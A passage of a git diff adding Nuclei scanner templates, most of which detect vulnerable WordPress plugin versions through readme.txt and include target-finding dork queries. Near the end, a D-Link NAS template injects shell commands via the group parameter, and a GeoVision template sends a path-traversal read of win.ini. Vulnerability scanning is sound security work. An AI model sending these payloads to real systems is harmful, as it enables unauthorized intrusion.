name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "constant-contact-forms-by-mailmunch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml b/poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml new file mode 100644 index 0000000000..22140dbc38 --- /dev/null +++ b/poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e + +info: + name: > + Contact Form 7 Summary and Print <= 1.2.5 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Contact Form 7 Summary and Print plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the cf7sp_save_settings() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f00b763-1b8a-4a20-96c6-7a93adf806e4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-38724 + metadata: + fofa-query: "wp-content/plugins/cf7-summary-and-print/" + google-query: inurl:"/wp-content/plugins/cf7-summary-and-print/" + shodan-query: 'vuln:CVE-2024-38724' + tags: cve,wordpress,wp-plugin,cf7-summary-and-print,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-summary-and-print/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-summary-and-print" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml b/poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml new file mode 100644 index 0000000000..bf655cc2d5 --- /dev/null +++ b/poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-47638-e7353821f2fc91f455eddee79fe76776 + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8f7d1c3-50eb-44ef-a832-a0230ff1406f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-47638 + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:CVE-2024-47638' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml b/poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml new file mode 100644 index 0000000000..ee9b2848a9 --- /dev/null +++ b/poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f + +info: + name: > + VdoCipher <= 1.29 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The VdoCipher plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae7fa018-c87f-463b-84a3-bbe71b73d3dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-47639 + metadata: + fofa-query: "wp-content/plugins/vdocipher/" + google-query: inurl:"/wp-content/plugins/vdocipher/" + shodan-query: 'vuln:CVE-2024-47639' + tags: cve,wordpress,wp-plugin,vdocipher,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vdocipher/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vdocipher" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.29') \ No newline at end of file diff --git a/poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml b/poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml new file mode 100644 index 0000000000..1e473538dc --- /dev/null +++ b/poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-52377-892589d65d97802ea2d1e85ee0198106 + +info: + name: > + Instant Image Generator <= 1.5.2 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Instant Image Generator (One Click Image Uploads from Pixabay, Pexels and OpenAI) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in a function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8276ecfe-962b-4813-8011-4c8ca59d5389?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-52377 + metadata: + fofa-query: "wp-content/plugins/ai-image/" + google-query: inurl:"/wp-content/plugins/ai-image/" + shodan-query: 'vuln:CVE-2024-52377' + tags: cve,wordpress,wp-plugin,ai-image,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ai-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ai-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml b/poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml new file mode 100644 index 0000000000..687cf5bbd6 --- /dev/null +++ b/poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.25.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter of the Icon widget in all versions up to, and including, 3.25.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1305be5-8267-475f-b962-62e3930116e1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8236 + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:CVE-2024-8236' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.25.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml b/poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml new file mode 100644 index 0000000000..a9aa82fb15 --- /dev/null +++ b/poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Sensitive Information Exposure via sg_content_template + author: topscoder + severity: low + description: > + The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the render_content function in class/elements/views/class-tabs-view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4efc9c47-321a-4635-943f-785ffc34d851?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8899 + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:CVE-2024-8899' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml b/poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml new file mode 100644 index 0000000000..3b3b842854 --- /dev/null +++ b/poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162 + +info: + name: > + Booster for WooCommerce <= 7.2.3 - Authenticated (ShopManager+) Stored Cross-Site Scripting via wcj_product_meta Shortcode + author: topscoder + severity: low + description: > + The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wcj_product_meta shortcode in all versions up to, and including, 7.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with ShopManager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9170 + metadata: + fofa-query: "wp-content/plugins/woocommerce-jetpack/" + google-query: inurl:"/wp-content/plugins/woocommerce-jetpack/" + shodan-query: 'vuln:CVE-2024-9170' + tags: cve,wordpress,wp-plugin,woocommerce-jetpack,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-jetpack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-jetpack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml b/poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml new file mode 100644 index 0000000000..100cc6f1bb --- /dev/null +++ b/poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9307-99143edb3a824cd072b593997866abef + +info: + name: > + mFolio Lite <= 1.2.1 - Missing Authorization to Authenticated (Author+) File Upload via EXE and SVG Files + author: topscoder + severity: low + description: > + The mFolio Lite plugin for WordPress is vulnerable to file uploads due to a missing capability check in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file or upload arbitrary EXE files on the affected site's server which may make remote code execution possible if the attacker can also gain access to run the .exe file, or trick a site visitor into downloading and running the .exe file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b4012dd-7c0a-45f1-8ada-8f9dc6867e1e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-9307 + metadata: + fofa-query: "wp-content/plugins/mfolio-lite/" + google-query: inurl:"/wp-content/plugins/mfolio-lite/" + shodan-query: 'vuln:CVE-2024-9307' + tags: cve,wordpress,wp-plugin,mfolio-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mfolio-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mfolio-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml b/poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml new file mode 100644 index 0000000000..b3bb7ce0a6 --- /dev/null +++ b/poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9 + +info: + name: > + Total Upkeep <= 1.16.6 - Authenticated (Administrator+) Remote Code Execution via Backup Settings + author: topscoder + severity: low + description: > + The Total Upkeep – WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.6 via the cron_interval parameter. This is due to missing input validation and sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9461 + metadata: + fofa-query: "wp-content/plugins/boldgrid-backup/" + google-query: inurl:"/wp-content/plugins/boldgrid-backup/" + shodan-query: 'vuln:CVE-2024-9461' + tags: cve,wordpress,wp-plugin,boldgrid-backup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "boldgrid-backup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.16.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml b/poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml new file mode 100644 index 0000000000..97389045b9 --- /dev/null +++ b/poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9504-029455c801fdee249681893f5eb0c87b + +info: + name: > + Booking calendar, Appointment Booking System <= 3.2.15 - Unauthenticated Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: high + description: > + The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-9504 + metadata: + fofa-query: "wp-content/plugins/booking-calendar/" + google-query: inurl:"/wp-content/plugins/booking-calendar/" + shodan-query: 'vuln:CVE-2024-9504' + tags: cve,wordpress,wp-plugin,booking-calendar,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.15') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml b/poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml new file mode 100644 index 0000000000..71aff737b4 --- /dev/null +++ b/poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9614-0ef94d7a238d24553757f1a16696672d + +info: + name: > + Constant Contact Forms by MailMunch <= 2.1.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/92abab9e-904a-4a62-a911-a57baa9aa4af?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9614 + metadata: + fofa-query: "wp-content/plugins/constant-contact-forms-by-mailmunch/" + google-query: inurl:"/wp-content/plugins/constant-contact-forms-by-mailmunch/" + shodan-query: 'vuln:CVE-2024-9614' + tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/constant-contact-forms-by-mailmunch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "constant-contact-forms-by-mailmunch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml b/poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml new file mode 100644 index 0000000000..fd2cbbe968 --- /dev/null +++ b/poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9988-287bf623a719e14be52f61193b77398b + +info: + name: > + Crypto <= 2.19 - Authentication Bypass via register + author: topscoder + severity: critical + description: > + The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.19. This is due to missing validation on the user being supplied in the 'crypto_connect_ajax_process::register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9988 + metadata: + fofa-query: "wp-content/plugins/crypto/" + google-query: inurl:"/wp-content/plugins/crypto/" + shodan-query: 'vuln:CVE-2024-9988' + tags: cve,wordpress,wp-plugin,crypto,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crypto/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crypto" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.19') \ No newline at end of file diff --git a/poc/debug/aspx-debug-mode.yaml b/poc/debug/aspx-debug-mode.yaml index 50a5ae5cbd..9b15bb6341 100644 --- a/poc/debug/aspx-debug-mode.yaml +++ b/poc/debug/aspx-debug-mode.yaml @@ -6,9 +6,11 @@ info: severity: info reference: - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled - tags: debug + metadata: + max-request: 1 + tags: debug,misconfig -requests: +http: - raw: - | DEBUG /Foobar-debug.aspx HTTP/1.1 @@ -22,11 +24,15 @@ requests: - type: status status: - 200 + - type: word words: - 'OK' part: body + - type: word words: - 'Content-Length: 2' part: header + +# digest: 4a0a00473045022100e7a32aaa7cff08a4dddee13a653b02f87f89517cf5265e21898c31c6f96f25a90220098bf55aeaca69565900838b0a9ea62c3669bf923e3d1a0ec98c7e6db27b77de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..a8cdba0344 --- /dev/null +++ b/poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-header-footer-script-loader/" + google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-header-footer-script-loader" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/injection/Command Injection.yaml b/poc/injection/Command Injection.yaml new file mode 100644 index 0000000000..d9bafbcde7 --- /dev/null +++ b/poc/injection/Command Injection.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-10915 + +info: + name: D-Link NAS - Command Injection via Group Parameter + author: s4e-io + severity: critical + description: | + A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection. + reference: + - https://www.usom.gov.tr/bildirim/tr-24-1836 + - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4 + - https://nvd.nist.gov/vuln/detail/CVE-2024-10915 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-10915 + cwe-id: CWE-78,CWE-707 + epss-score: 0.0408 + epss-percentile: 0.92375 + cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: dlink + product: dns-320_firmware + shodan-query: http.html:"sharecenter" + fofa-query: body="sharecenter" + tags: cve,cve2024,dlink,sharecenter,rce + +http: + - raw: + - | + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1 + Host: {{Hostname}} + + payloads: + command: + - "id" + - "ifconfig" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" + - "contains_all(body, 'inet addr:', 'Mask:')" + condition: or + + - type: dsl + dsl: + - 'contains(body, "Content-type: text/html")' + - "status_code == 200" + condition: and +# digest: 4b0a00483046022100bbc4e26d910b3948b3e37bbd063882ae16a09988e6798da089e5bd006f1ff7ed022100ee3139d82637396d87421c0e84185377ae8f02bfdd6e4897ba7b6c9646708aaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/local_file_inclusion/geowebserver-lfi-xss.yaml b/poc/local_file_inclusion/geowebserver-lfi-xss.yaml new file mode 100644 index 0000000000..181328a74d --- /dev/null +++ b/poc/local_file_inclusion/geowebserver-lfi-xss.yaml @@ -0,0 +1,50 @@ +id: geovision-geowebserver-lfi-xss + +info: + name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting + author: shamo0 + severity: high + description: | + GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft. + reference: + - https://www.geovision.com.tw/cyber_security.php + - https://www.exploit-db.com/exploits/50211 + metadata: + verified: true + max-request: 3 + shodan-query: title:"Geowebserver" + tags: geovision,geowebserver,lfi,xss + +http: + - raw: + - | + GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + Host: {{Hostname}} + + - | + POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + + - | + GET 